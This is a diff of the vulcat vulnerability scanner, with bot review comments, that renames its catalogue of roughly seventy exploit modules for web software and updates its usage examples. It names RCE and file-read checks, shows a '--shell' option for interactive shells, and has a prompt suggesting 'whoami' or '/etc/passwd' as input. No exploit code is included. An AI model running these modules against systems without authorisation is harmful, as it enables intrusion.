- 'input_command': 'Enter the value according to the vulnerability type(e.g. "whoami"or"/etc/passwd"): ',
+ 'input_command': 'Enter the value according to the vulnerability type(e.g. whoami): ',
'not_command': 'Please enter the command(You can enter "exit" to exit)',
'faild_command': '[Faild] An error occurred while using the command',
'not_search_command': '[INFO] Description Failed to replace the new payload, No old payload was detected in the old HTTP packet',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 232f258..ef24137 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -9,9 +9,10 @@
description_t = '\t\t' # * 中英文标题的长度不一样, 中文需要添加\t才能对齐
# * ---横线长度---
-Target_len_ = '-' * 22
-Vul_id_len_ = '-' * 20
-Type_len_ = '-' * 14
+Target_len_ = '-' * 58
+# Target_len_ = '-' * 22
+# Vul_id_len_ = '-' * 20
+# Type_len_ = '-' * 14
Shell_len_ = '-' * 5
Description_len_ = '-' * 70
@@ -26,22 +27,24 @@ def list():
shell_num = 0
vul_list = ''
- vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+ vul_list += '+' + Target_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+ # vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
for vul in vul_info:
for info in vul_info[vul]:
vul_num += 1
if info['shell'] in ['Y', 'M']:
shell_num += 1
- vul_list += '| {}|'.format(vul.ljust(21))
- vul_list += ' {}|'.format(info['vul_id'].ljust(19))
- vul_list += ' {}|'.format(info['type'].ljust(13))
+ vul_list += '| {}|'.format(info['payload'].ljust(57))
+ # vul_list += ' {}|'.format(info['vul_id'].ljust(19))
+ # vul_list += ' {}|'.format(info['type'].ljust(13))
vul_list += ' {}|'.format(info['shell'].center(4))
vul_list += ' {}\t\t|'.format(info['description'].ljust(51))
vul_list += '\n'
- vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+ # vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
+ vul_list += '+' + Target_len_ + '+' + Shell_len_ + '+' + Description_len_ + '+\n'
- print(color.cyan(vul_list + 'vulcat-1.2.0/2023.03.01')) # * 2023-03-01 09:00:00
+ print(color.cyan(vul_list + 'vulcat-2.0.0/2023.03.15')) # * 2023-03-15 09:00:00
print(color.cyan(str(vul_num - 1) + '/Poc')) # * 有一个是标题, 所以要-1
print(color.cyan(str(shell_num) + '/Shell'))
# print(vul_num)
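Review bot: The version banner `'vulcat-2.0.0/2023.03.15'` is hard-coded inside the `print(...)` call and must be edited by hand every release (the same string appears in the README hunk earlier in this patch), which is how stale banners happen; a single module-level `VERSION` constant used here and wherever else the banner is printed removes the duplication. The commented-out old-layout lines (`# vul_list += '+' + Target_len_ + ...`, `# vul_list += ' {}|'.format(info['vul_id']...`, and the `# Target_len_`/`# Vul_id_len_`/`# Type_len_` constants in the previous hunk) should be removed rather than kept as dead code.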
@@ -50,433 +53,385 @@ def list():
vul_info = {
'Target': [
{
- 'vul_id': 'Vuln id',
- 'type': 'Vuln Type',
+ 'payload': 'Payloads',
'shell': 'Sh ',
'description': 'Description' + description_t
}
],
+ '74cms': [
+ {
+ 'payload': '74cms-v5.0.1-sqlinject',
+ 'shell': '-',
+ 'description': list_lang['74cms']['v5.0.1-sqlinject']
+ },
+ {
+ 'payload': '74cms-v6.0.4-xss',
+ 'shell': '-',
+ 'description': list_lang['74cms']['v6.0.4-xss']
+ }
+ ],
'Alibaba Druid': [
{
- 'vul_id': '(None)',
- 'type': 'unAuth',
+ 'payload': 'alibaba-druid-unauth',
'shell': '-',
'description': list_lang['Alibaba Druid']
}
],
'Alibaba Nacos': [
{
- 'vul_id': 'CVE-2021-29441',
- 'type': 'unAuth',
+ 'payload': 'alibaba-nacos-cve-2021-29441-unauth',
'shell': '-',
'description': list_lang['Alibaba Nacos']['CVE-2021-29441']
}
],
'Apache Airflow': [
{
- 'vul_id': 'CVE-2020-17526',
- 'type': 'unAuth',
+ 'payload': 'apache-airflow-cve-2020-17526-unauth',
'shell': '-',
'description': list_lang['Apache Airflow']['CVE-2020-17526']
}
],
'Apache APISIX': [
{
- 'vul_id': 'CVE-2020-13945',
- 'type': 'unAuth',
+ 'payload': 'apache-apisix-cve-2020-13945-unauth',
'shell': '-',
'description': list_lang['Apache APISIX']['CVE-2020-13945']
}
],
'Apache Druid': [
{
- 'vul_id': 'CVE-2021-25646',
- 'type': 'RCE',
+ 'payload': 'apache-druid-cve-2021-25646-rce',
'shell': 'Y',
'description': list_lang['Apache Druid']['CVE-2021-25646']
},
{
- 'vul_id': 'CVE-2021-36749',
- 'type': 'FileRead',
+ 'payload': 'apache-druid-cve-2021-36749-fileread',
'shell': 'Y',
'description': list_lang['Apache Druid']['CVE-2021-36749']
},
],
'Apache Flink': [
{
- 'vul_id': 'CVE-2020-17519',
- 'type': 'FileRead',
+ 'payload': 'apache-flink-cve-2020-17519-fileread',
'shell': 'Y',
'description': list_lang['Apache Flink']['CVE-2020-17519']
}
],
'Apache Hadoop': [
{
- 'vul_id': '(None)',
- 'type': 'unAuth',
+ 'payload': 'apache-hadoop-unauth',
'shell': '-',
'description': list_lang['Apache Hadoop']
}
],
'Apache Httpd': [
{
- 'vul_id': 'CVE-2021-40438',
- 'type': 'SSRF',
+ 'payload': 'apache-httpd-cve-2021-40438-ssrf',
'shell': '-',
'description': list_lang['Apache Httpd']['CVE-2021-40438']
},
{
- 'vul_id': 'CVE-2021-41773',
- 'type': 'FileRead/RCE',
+ 'payload': 'apache-httpd-cve-2021-41773-rce-fileread',
'shell': 'Y',
'description': list_lang['Apache Httpd']['CVE-2021-41773']
},
{
- 'vul_id': 'CVE-2021-42013',
- 'type': 'FileRead/RCE',
+ 'payload': 'apache-httpd-cve-2021-42013-rce-fileread',
'shell': 'Y',
'description': list_lang['Apache Httpd']['CVE-2021-42013']
}
],
'Apache SkyWalking': [
{
- 'vul_id': 'CVE-2020-9483',
- 'type': 'SQLinject',
+ 'payload': 'apache-skywalking-cve-2020-9483-sqlinject',
'shell': '-',
'description': list_lang['Apache SkyWalking']['CVE-2020-9483']
}
],
'Apache Solr': [
{
- 'vul_id': 'CVE-2017-12629',
- 'type': 'RCE',
+ 'payload': 'apache-solr-cve-2017-12629-rce',
'shell': '-',
'description': list_lang['Apache Solr']['CVE-2017-12629']
},
{
- 'vul_id': 'CVE-2019-17558',
- 'type': 'RCE',
+ 'payload': 'apache-solr-cve-2019-17558-rce',
'shell': 'Y',
'description': list_lang['Apache Solr']['CVE-2019-17558']
},
{
- 'vul_id': 'CVE-2021-27905',
- 'type': 'SSRF/FileRead',
+ 'payload': 'apache-solr-cve-2021-27905-ssrf-fileread',
'shell': 'Y',
'description': list_lang['Apache Solr']['CVE-2021-27905']
},
],
'Apache Tomcat': [
{
- 'vul_id': 'CVE-2017-12615',
- 'type': 'FileUpload',
+ 'payload': 'apache-tomcat-cve-2017-12615-fileupload',
'shell': '-',
'description': list_lang['Apache Tomcat']['CVE-2017-12615']
}
],
'Apache Unomi': [
{
- 'vul_id': 'CVE-2020-13942',
- 'type': 'RCE',
+ 'payload': 'apache-unomi-cve-2020-13942-rce',
'shell': 'Y',
'description': list_lang['Apache Unomi']['CVE-2020-13942']
}
],
'AppWeb': [
{
- 'vul_id': 'CVE-2018-8715',
- 'type': 'unAuth',
+ 'payload': 'appweb-cve-2018-8715-unauth',
'shell': '-',
'description': list_lang['AppWeb']['CVE-2018-8715']
}
],
'Atlassian Confluence': [
{
- 'vul_id': 'CVE-2015-8399',
- 'type': 'FileRead',
+ 'payload': 'atlassian-confluence-cve-2015-8399-fileread-fileinclude',
'shell': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2015-8399']
},
{
- 'vul_id': 'CVE-2019-3396',
- 'type': 'FileRead',
+ 'payload': 'atlassian-confluence-cve-2019-3396-fileread',
'shell': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2019-3396']
},
{
- 'vul_id': 'CVE-2021-26084',
- 'type': 'RCE',
+ 'payload': 'atlassian-confluence-cve-2021-26084-rce',
'shell': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2021-26084']
},
{
- 'vul_id': 'CVE-2022-26134',
- 'type': 'RCE',
+ 'payload': 'atlassian-confluence-cve-2022-26134-rce',
'shell': 'Y',
'description': list_lang['Atlassian Confluence']['CVE-2022-26134']
}
],
'Cisco': [
{
- 'vul_id': 'CVE-2020-3580',
- 'type': 'XSS',
+ 'payload': 'cisco-cve-2020-3580-xss',
'shell': '-',
'description': list_lang['Cisco']['CVE-2020-3580']
}
],
'Discuz': [
{
- 'vul_id': 'wooyun-2010-080723',
- 'type': 'RCE',
+ 'payload': 'discuz-wooyun-2010-080723-rce',
'shell': 'Y',
'description': list_lang['Discuz']['wooyun-2010-080723']
}
],
'Django': [
{
- 'vul_id': 'CVE-2017-12794',
- 'type': 'XSS',
+ 'payload': 'django-cve-2017-12794-xss',
'shell': '-',
'description': list_lang['Django']['CVE-2017-12794']
},
{
- 'vul_id': 'CVE-2018-14574',
- 'type': 'Redirect',
+ 'payload': 'django-cve-2018-14574-redirect',
'shell': '-',
'description': list_lang['Django']['CVE-2018-14574']
},
{
- 'vul_id': 'CVE-2019-14234',
- 'type': 'SQLinject',
+ 'payload': 'django-cve-2019-14234-sqlinject',
'shell': '-',
'description': list_lang['Django']['CVE-2019-14234']
},
{
- 'vul_id': 'CVE-2020-9402',
- 'type': 'SQLinject',
+ 'payload': 'django-cve-2020-9402-sqlinject',
'shell': '-',
'description': list_lang['Django']['CVE-2020-9402']
},
{
- 'vul_id': 'CVE-2021-35042',
- 'type': 'SQLinject',
+ 'payload': 'django-cve-2021-35042-sqlinject',
'shell': '-',
'description': list_lang['Django']['CVE-2021-35042']
}
],
'Drupal': [
{
- 'vul_id': 'CVE-2014-3704',
- 'type': 'SQLinject',
+ 'payload': 'drupal-cve-2014-3704-sqlinject',
'shell': '-',
'description': list_lang['Drupal']['CVE-2014-3704']
},
{
- 'vul_id': 'CVE-2017-6920',
- 'type': 'RCE',
+ 'payload': 'drupal-cve-2017-6920-rce',
'shell': '-',
'description': list_lang['Drupal']['CVE-2017-6920']
},
{
- 'vul_id': 'CVE-2018-7600',
- 'type': 'RCE',
+ 'payload': 'drupal-cve-2018-7600-rce',
'shell': 'Y',
'description': list_lang['Drupal']['CVE-2018-7600']
},
{
- 'vul_id': 'CVE-2018-7602',
- 'type': 'RCE',
+ 'payload': 'drupal-cve-2018-7602-rce',
'shell': '-',
'description': list_lang['Drupal']['CVE-2018-7602']
}
],
'ElasticSearch': [
{
- 'vul_id': 'CVE-2014-3120',
- 'type': 'RCE',
+ 'payload': 'elasticsearch-cve-2014-3120-rce',
'shell': 'Y',
'description': list_lang['ElasticSearch']['CVE-2014-3120']
},
{
- 'vul_id': 'CVE-2015-1427',
- 'type': 'RCE',
+ 'payload': 'elasticsearch-cve-2015-1427-rce',
'shell': 'Y',
'description': list_lang['ElasticSearch']['CVE-2015-1427']
},
{
- 'vul_id': 'CVE-2015-3337',
- 'type': 'FileRead',
+ 'payload': 'elasticsearch-cve-2015-3337-fileread',
'shell': 'Y',
'description': list_lang['ElasticSearch']['CVE-2015-3337']
},
{
- 'vul_id': 'CVE-2015-5531',
- 'type': 'FileRead',
+ 'payload': 'elasticsearch-cve-2015-5531-fileread',
'shell': 'Y',
'description': list_lang['ElasticSearch']['CVE-2015-5531']
},
],
'F5 BIG-IP': [
{
- 'vul_id': 'CVE-2020-5902',
- 'type': 'RCE',
+ 'payload': 'f5bigip-cve-2020-5902-rce-fileread',
'shell': '-',
'description': list_lang['F5 BIG-IP']['CVE-2020-5902']
},
{
- 'vul_id': 'CVE-2022-1388',
- 'type': 'unAuth/RCE',
+ 'payload': 'f5bigip-cve-2022-1388-unauth-rce',
'shell': 'Y',
- 'description': list_lang['F5 BIG-IP']['CVE-2020-5902']
+ 'description': list_lang['F5 BIG-IP']['CVE-2022-1388']
}
],
'Fastjson': [
{
- 'vul_id': 'CNVD-2017-02833',
- 'type': 'unSerialize',
+ 'payload': 'fastjson-cnvd-2017-02833-rce',
'shell': 'Y',
'description': list_lang['Fastjson']['CNVD-2017-02833']
},
{
- 'vul_id': 'CNVD-2019-22238',
- 'type': 'unSerialize',
+ 'payload': 'fastjson-cnvd-2019-22238-rce',
'shell': 'Y',
'description': list_lang['Fastjson']['CNVD-2019-22238']
},
{
- 'vul_id': 'rce-1-2-62',
- 'type': 'unSerialize',
+ 'payload': 'fastjson-v1.2.62-rce',
'shell': 'Y',
'description': list_lang['Fastjson']['rce-1-2-62']
},
{
- 'vul_id': 'rce-1-2-66',
- 'type': 'unSerialize',
+ 'payload': 'fastjson-v1.2.66-rce',
'shell': 'Y',
'description': list_lang['Fastjson']['rce-1-2-66']
}
],
'Gitea': [
{
- 'vul_id': '(None)',
- 'type': 'unAuth',
+ 'payload': 'gitea-unauth-fileread-rce',
'shell': '-',
'description': list_lang['Gitea']
},
],
'Gitlab': [
{
- 'vul_id': 'CVE-2021-22205',
- 'type': 'RCE',
+ 'payload': 'gitlab-cve-2021-22205-rce.py',
'shell': '-',
'description': list_lang['Gitlab']['CVE-2021-22205']
},
{
- 'vul_id': 'CVE-2021-22214',
- 'type': 'SSRF',
+ 'payload': 'gitlab-cve-2021-22214-ssrf',
'shell': 'Y',
'description': list_lang['Gitlab']['CVE-2021-22214']
}
],
'GoCD': [
{
- 'vul_id': 'CVE-2021-43287',
- 'type': 'FileRead',
+ 'payload': 'gocd-cve-2021-43287-fileread',
'shell': 'Y',
'description': list_lang['GoCD']['CVE-2021-43287']
},
],
'Grafana': [
{
- 'vul_id': 'CVE-2021-43798',
- 'type': 'FileRead',
+ 'payload': 'grafana-cve-2021-43798-fileread',
'shell': 'Y',
'description': list_lang['Grafana']['CVE-2021-43798']
},
],
'Influxdb': [
{
- 'vul_id': '(None)',
- 'type': 'unAuth',
+ 'payload': 'influxdb-unauth',
'shell': '-',
'description': list_lang['Influxdb']
},
],
'JBoss': [
{
- 'vul_id': '(None)',
- 'type': 'unAuth',
+ 'payload': 'jboss-unauth',
'shell': '-',
'description': list_lang['JBoss']['unAuth']
}
],
'Jenkins': [
{
- 'vul_id': 'CVE-2018-1000861',
- 'type': 'RCE',
+ 'payload': 'jenkins-cve-2018-1000861-rce',
'shell': 'Y',
'description': list_lang['Jenkins']['CVE-2018-1000861']
},
{
- 'vul_id': '(None)',
- 'type': 'unAuth',
+ 'payload': 'jenkins-unauth',
'shell': 'Y',
'description': list_lang['Jenkins']['unAuth']
},
],
'Jetty': [
{
- 'vul_id': 'CVE-2021-28164',
- 'type': 'DSinfo',
+ 'payload': 'jetty-cve-2021-28164-dsinfo',
'shell': '-',
'description': list_lang['Jetty']['CVE-2021-28164']
},
{
- 'vul_id': 'CVE-2021-28169',
- 'type': 'DSinfo',
+ 'payload': 'jetty-cve-2021-28169-dsinfo',
'shell': '-',
'description': list_lang['Jetty']['CVE-2021-28169']
},
{
- 'vul_id': 'CVE-2021-34429',
- 'type': 'DSinfo',
+ 'payload': 'jetty-cve-2021-34429-dsinfo',
'shell': '-',
'description': list_lang['Jetty']['CVE-2021-34429']
}
],
'Joomla': [
{
- 'vul_id': 'CVE-2017-8917',
- 'type': 'SQLinject',
+ 'payload': 'joomla-cve-2017-8917-sqlinject',
'shell': '-',
'description': list_lang['Joomla']['CVE-2017-8917']
},
{
- 'vul_id': 'CVE-2023-23752',
- 'type': 'unAuth',
+ 'payload': 'joomla-cve-2023-23752-unauth',
'shell': '-',
'description': list_lang['Joomla']['CVE-2023-23752']
},
],
'Jupyter': [
{
- 'vul_id': '(None)',
- 'type': 'unAuth',
+ 'payload': 'jupyter-unauth',
'shell': '-',
'description': list_lang['Jupyter']
}
],
'Keycloak': [
{
- 'vul_id': 'CVE-2020-10770',
- 'type': 'SSRF',
+ 'payload': 'keycloak-cve-2020-10770-ssrf',
'shell': '-',
'description': list_lang['Keycloak']['CVE-2020-10770']
}
],
# 'Kindeditor': [
# {
- # 'vul_id': 'CVE-2018-18950',
+ # 'payload': '',
# 'type': 'FileRead',
# 'method': 'GET',
# 'description': list_lang['']['']
@@ -484,332 +439,295 @@ def list():
# ],
'Landray': [
{
- 'vul_id': 'CNVD-2021-28277',
- 'type': 'FileRead/SSRF',
+ 'payload': 'landray-oa-cnvd-2021-28277-ssrf-fileread',
'shell': 'Y',
'description': list_lang['Landray']['CNVD-2021-28277']
}
],
'Mini Httpd': [
{
- 'vul_id': 'CVE-2018-18778',
- 'type': 'FileRead',
+ 'payload': 'minihttpd-cve-2018-18778-fileread',
'shell': '-',
'description': list_lang['Mini Httpd']['CVE-2018-18778']
}
],
'mongo-express': [
{
- 'vul_id': 'CVE-2019-10758',
- 'type': 'RCE',
+ 'payload': 'mongoexpress-cve-2019-10758-rce',
'shell': 'Y',
'description': list_lang['mongo-express']['CVE-2019-10758']
}
],
'Nexus Repository': [
{
- 'vul_id': 'CVE-2019-5475',
- 'type': 'RCE',
+ 'payload': 'nexus-cve-2019-5475-rce',
'shell': 'Y',
'description': list_lang['Nexus Repository']['CVE-2019-5475']
},
{
- 'vul_id': 'CVE-2019-7238',
- 'type': 'RCE',
+ 'payload': 'nexus-cve-2019-7238-rce',
'shell': 'Y',
'description': list_lang['Nexus Repository']['CVE-2019-7238']
},
{
- 'vul_id': 'CVE-2019-15588',
- 'type': 'RCE',
+ 'payload': 'nexus-cve-2019-15588-rce',
'shell': 'Y',
'description': list_lang['Nexus Repository']['CVE-2019-15588']
},
{
- 'vul_id': 'CVE-2020-10199',
- 'type': 'RCE',
+ 'payload': 'nexus-cve-2020-10199-rce',
'shell': 'Y',
'description': list_lang['Nexus Repository']['CVE-2020-10199']
},
{
- 'vul_id': 'CVE-2020-10204',
- 'type': 'RCE',
+ 'payload': 'nexus-cve-2020-10204-rce',
'shell': 'Y',
'description': list_lang['Nexus Repository']['CVE-2020-10204']
}
],
'Nodejs': [
{
- 'vul_id': 'CVE-2017-14849',
- 'type': 'FileRead',
+ 'payload': 'nodejs-cve-2017-14849-fileread',
'shell': 'Y',
'description': list_lang['Nodejs']['CVE-2017-14849']
},
{
- 'vul_id': 'CVE-2021-21315',
- 'type': 'RCE',
+ 'payload': 'nodejs-cve-2021-21315-rce',
'shell': 'Y',
'description': list_lang['Nodejs']['CVE-2021-21315']
}
],
'NodeRED': [
{
- 'vul_id': 'CVE-2021-3223',
- 'type': 'FileRead',
+ 'payload': 'nodered-cve-2021-3223-fileread',
'shell': 'Y',
'description': list_lang['NodeRED']['CVE-2021-3223']
}
],
'phpMyadmin': [
{
- 'vul_id': 'WooYun-2016-199433',
- 'type': 'unSerialize',
+ 'payload': 'phpmyadmin-cve-2018-12613-fileinclude-fileread',
'shell': '-',
'description': list_lang['phpMyadmin']['WooYun-2016-199433']
},
{
- 'vul_id': 'CVE-2018-12613',
- 'type': 'FileInclude',
+ 'payload': 'phpmyadmin-wooyun-2016-199433-unserialize',
'shell': 'Y',
'description': list_lang['phpMyadmin']['CVE-2018-12613']
},
],
'PHPUnit': [
{
- 'vul_id': 'CVE-2017-9841',
- 'type': 'RCE',
+ 'payload': 'phpunit-cve-2017-9841-rce',
'shell': 'Y',
'description': list_lang['PHPUnit']['CVE-2017-9841']
}
],
'Ruby on Rails': [
{
- 'vul_id': 'CVE-2018-3760',
- 'type': 'FileRead',
+ 'payload': 'ruby-on-rails-cve-2018-3760-fileread',
'shell': 'Y',
'description': list_lang['Ruby on Rails']['CVE-2018-3760']
},
{
- 'vul_id': 'CVE-2019-5418',
- 'type': 'FileRead',
+ 'payload': 'ruby-on-rails-cve-2019-5418-fileread',
'shell': 'Y',
'description': list_lang['Ruby on Rails']['CVE-2019-5418']
},
{
- 'vul_id': 'CVE-2020-8163',
- 'type': 'RCE',
+ 'payload': 'ruby-on-rails-cve-2020-8163-rce',
'shell': '-',
'description': list_lang['Ruby on Rails']['CVE-2020-8163']
}
],
'ShowDoc': [
{
- 'vul_id': 'CNVD-2020-26585',
- 'type': 'FileUpload',
+ 'payload': 'showdoc-cnvd-2020-26585-fileupload',
'shell': '-',
'description': list_lang['ShowDoc']['CNVD-2020-26585']
}
],
'Spring': [
{
- 'vul_id': 'CVE-2016-4977',
- 'type': 'RCE',
+ 'payload': 'spring-security-oauth-cve-2016-4977-rce',
'shell': '-',
'description': list_lang['Spring']['CVE-2016-4977']
},
{
- 'vul_id': 'CVE-2017-8046',
- 'type': 'RCE',
+ 'payload': 'spring-data-rest-cve-2017-8046-rce',
'shell': '-',
'description': list_lang['Spring']['CVE-2017-8046']
},
{
- 'vul_id': 'CVE-2018-1273',
- 'type': 'RCE',
+ 'payload': 'spring-data-commons-cve-2018-1273-rce',
'shell': 'Y',
'description': list_lang['Spring']['CVE-2018-1273']
},
{
- 'vul_id': 'CVE-2020-5410',
- 'type': 'FileRead',
+ 'payload': 'spring-cloud-config-cve-2020-5410-fileread',
'shell': 'Y',
'description': list_lang['Spring']['CVE-2020-5410']
},
{
- 'vul_id': 'CVE-2021-21234',
- 'type': 'FileRead',
+ 'payload': 'spring-boot-cve-2021-21234-fileread',
'shell': 'Y',
'description': list_lang['Spring']['CVE-2021-21234']
},
{
- 'vul_id': 'CVE-2022-22947',
- 'type': 'RCE',
+ 'payload': 'spring-cloud-gateway-cve-2022-22947-rce',
'shell': '-',
'description': list_lang['Spring']['CVE-2022-22947']
},
{
- 'vul_id': 'CVE-2022-22963',
- 'type': 'RCE',
+ 'payload': 'spring-cloud-function-cve-2022-22963-rce',
'shell': 'Y',
'description': list_lang['Spring']['CVE-2022-22963']
},
{
- 'vul_id': 'CVE-2022-22965',
- 'type': 'RCE',
+ 'payload': 'spring-cve-2022-22965-rce',
'shell': '-',
'description': list_lang['Spring']['CVE-2022-22965']
},
],
'Supervisor': [
{
- 'vul_id': 'CVE-2017-11610',
- 'type': 'RCE',
+ 'payload': 'supervisor-cve-2017-11610-rce',
'shell': '-',
'description': list_lang['Supervisor']['CVE-2017-11610']
}
],
'ThinkPHP': [
{
- 'vul_id': 'CVE-2018-1002015',
- 'type': 'RCE',
+ 'payload': 'thinkphp-cve-2018-1002015-rce',
'shell': 'Y',
'description': list_lang['ThinkPHP']['CVE-2018-1002015']
},
{
- 'vul_id': 'CNVD-2018-24942',
- 'type': 'RCE',
+ 'payload': 'thinkphp-cnvd-2018-24942-rce',
'shell': 'Y',
'description': list_lang['ThinkPHP']['CNVD-2018-24942']
},
{
- 'vul_id': 'CNNVD-201901-445',
- 'type': 'RCE',
+ 'payload': 'thinkphp-cnnvd-201901-445-rce',
'shell': 'Y',
'description': list_lang['ThinkPHP']['CNNVD-201901-445']
},
{
- 'vul_id': 'CNVD-2022-86535',
- 'type': 'RCE',
+ 'payload': 'thinkphp-cnvd-2022-86535-rce',
'shell': '-',
'description': list_lang['ThinkPHP']['CNVD-2022-86535']
},
{
- 'vul_id': 'rce-2-x',
- 'type': 'RCE',
+ 'payload': 'thinkphp-2.x-rce',
'shell': '-',
'description': list_lang['ThinkPHP']['2.x RCE']
},
{
- 'vul_id': 'ids-sqlinject-5',
- 'type': 'SQLinject',
+ 'payload': 'thinkphp-5-ids-sqlinject',
'shell': '-',
'description': list_lang['ThinkPHP']['5 ids sqlinject']
}
],
'Ueditor': [
{
- 'vul_id': '(None)',
- 'type': 'SSRF',
+ 'payload': 'ueditor-ssrf',
'shell': '-',
'description': list_lang['Ueditor']
}
],
'uWSGI-PHP': [
{
- 'vul_id': 'CVE-2018-7490',
- 'type': 'FileRead',
+ 'payload': 'uwsgiphp-cve-2018-7490-fileread',
'shell': 'Y',
'description': list_lang['uWSGI-PHP']
}
],
+ 'VMware': [
+ {
+ 'payload': 'vmware-vcenter-2020-10-fileread',
+ 'shell': 'Y',
+ 'description': list_lang['VMware']['2020-10-fileread']
+ },
+ {
+ 'payload': 'vmware-vcenter-cve-2021-21972-fileupload-rce',
+ 'shell': '-',
+ 'description': list_lang['VMware']['CVE-2021-21972']
+ }
+ ],
'Oracle Weblogic': [
{
- 'vul_id': 'CVE-2014-4210',
- 'type': 'SSRF',
+ 'payload': 'oracle-weblogic-cve-2014-4210-ssrf',
'shell': '-',
'description': list_lang['Oracle Weblogic']['CVE-2014-4210']
},
{
- 'vul_id': 'CVE-2017-10271',
- 'type': 'unSerialize',
+ 'payload': 'oracle-weblogic-cve-2017-10271-unserialize',
'shell': '-',
'description': list_lang['Oracle Weblogic']['CVE-2017-10271']
},
{
- 'vul_id': 'CVE-2019-2725',
- 'type': 'unSerialize',
+ 'payload': 'oracle-weblogic-cve-2019-2725-unserialize',
'shell': '-',
'description': list_lang['Oracle Weblogic']['CVE-2019-2725']
},
{
- 'vul_id': 'CVE-2020-14750',
- 'type': 'unAuth',
+ 'payload': 'oracle-weblogic-cve-2020-14750-bypass',
'shell': '-',
'description': list_lang['Oracle Weblogic']['CVE-2020-14750']
},
{
- 'vul_id': 'CVE-2020-14882',
- 'type': 'RCE',
+ 'payload': 'oracle-weblogic-cve-2020-14882-rce-unauth',
'shell': 'Y',
'description': list_lang['Oracle Weblogic']['CVE-2020-14882']
},
{
- 'vul_id': 'CVE-2021-2109',
- 'type': 'RCE',
+ 'payload': 'oracle-weblogic-cve-2021-2109-rce',
'shell': '-',
'description': list_lang['Oracle Weblogic']['CVE-2021-2109']
}
],
'Webmin': [
{
- 'vul_id': 'CVE-2019-15107',
- 'type': 'RCE',
+ 'payload': 'webmin-cve-2019-15107-rce',
'shell': 'Y',
'description': list_lang['Webmin']['CVE-2019-15107']
},
{
- 'vul_id': 'CVE-2019-15642',
- 'type': 'RCE',
+ 'payload': 'webmin-cve-2019-15642-rce',
'shell': 'Y',
'description': list_lang['Webmin']['CVE-2019-15642']
}
],
'Yonyou': [
{
- 'vul_id': 'CNNVD-201610-923',
- 'type': 'SQLinject',
+ 'payload': 'yonyou-grp-u8-cnnvd-201610-923-sqlinject',
'shell': '-',
'description': list_lang['Yonyou']['CNNVD-201610-923']
},
{
- 'vul_id': 'CNVD-2021-30167',
- 'type': 'RCE',
+ 'payload': 'yonyou-nc-cnvd-2021-30167-rce',
'shell': 'Y',
'description': list_lang['Yonyou']['CNVD-2021-30167']
},
{
- 'vul_id': 'nc-fileread',
- 'type': 'FileRead',
+ 'payload': 'yonyou-erp-nc-ncfindweb-fileread',
'shell': '-',
'description': list_lang['Yonyou']['NCFindWeb']
},
{
- 'vul_id': 'u8-oa-getsession',
- 'type': 'DSinfo',
+ 'payload': 'yonyou-u8-oa-getsession-dsinfo',
'shell': '-',
'description': list_lang['Yonyou']['getSessionList.jsp']
},
{
- 'vul_id': 'u8-oa-test-sql',
- 'type': 'SQLinject',
+ 'payload': 'yonyou-u8-oa-test.jsp-sqlinject',
'shell': '-',
'description': list_lang['Yonyou']['test.jsp']
}
],
'Zabbix': [
{
- 'vul_id': 'CVE-2016-10134',
- 'type': 'SQLinject',
+ 'payload': 'zabbix-cve-2016-10134-sqlinject',
'shell': '-',
'description': list_lang['Zabbix']['CVE-2016-10134']
}
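Review bot: The two phpMyadmin entries have their `payload` names cross-wired with their `description`/`shell` fields: `phpmyadmin-cve-2018-12613-fileinclude-fileread` sits next to the WooYun-2016-199433 description with `shell: '-'`, while `phpmyadmin-wooyun-2016-199433-unserialize` carries the CVE-2018-12613 description with `shell: 'Y'`, the opposite of the rows being replaced (WooYun was `-`, CVE-2018-12613 was `Y`). If `payload` is what selects the module under `payloads/`, the listing and any `--shell` gating will describe the wrong check. Swap the two names: `'payload': 'phpmyadmin-wooyun-2016-199433-unserialize',` on the first entry and `'payload': 'phpmyadmin-cve-2018-12613-fileinclude-fileread',` on the second. The enclosing `list()` function starts before this hunk.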
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 1893b1b..5597e29 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -14,12 +14,13 @@ def parse():
parser = OptionParser('\n' + lang['disclaimer'] + '''Usage: python3 vulcat.py
Examples:
-python3 vulcat.py -u https://www.example.com/
-python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3
-python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
-python3 vulcat.py -f url.txt -t 10 -o html
+python3 vulcat.py -h
python3 vulcat.py --list
-''', version='vulcat.py-1.2.0\n')
+python3 vulcat.py -u https://www.example.com/
+python3 vulcat.py -f url.txt -o html
+python3 vulcat.py -u https://www.example.com/ -v httpd --log 3
+python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell
+''', version='vulcat.py-v2.0.0\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -29,7 +30,7 @@ def parse():
# * 可选参数
optional = parser.add_option_group(lang['optional_help']['title'], lang['optional_help']['name'])
optional.add_option('-t', '--thread', type='int', dest='thread', default=3, help=lang['optional_help']['thread'])
- optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay'])
+ optional.add_option('--delay', type='float', dest='delay', default=0.7, help=lang['optional_help']['delay'])
optional.add_option('--timeout', type='float', dest='timeout', default=10, help=lang['optional_help']['timeout'])
optional.add_option('--user-agent', type='string', dest='ua', default=None, help=lang['optional_help']['user_agent'])
optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie'])
@@ -48,7 +49,7 @@ def parse():
# * 指定目标类型
application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name'])
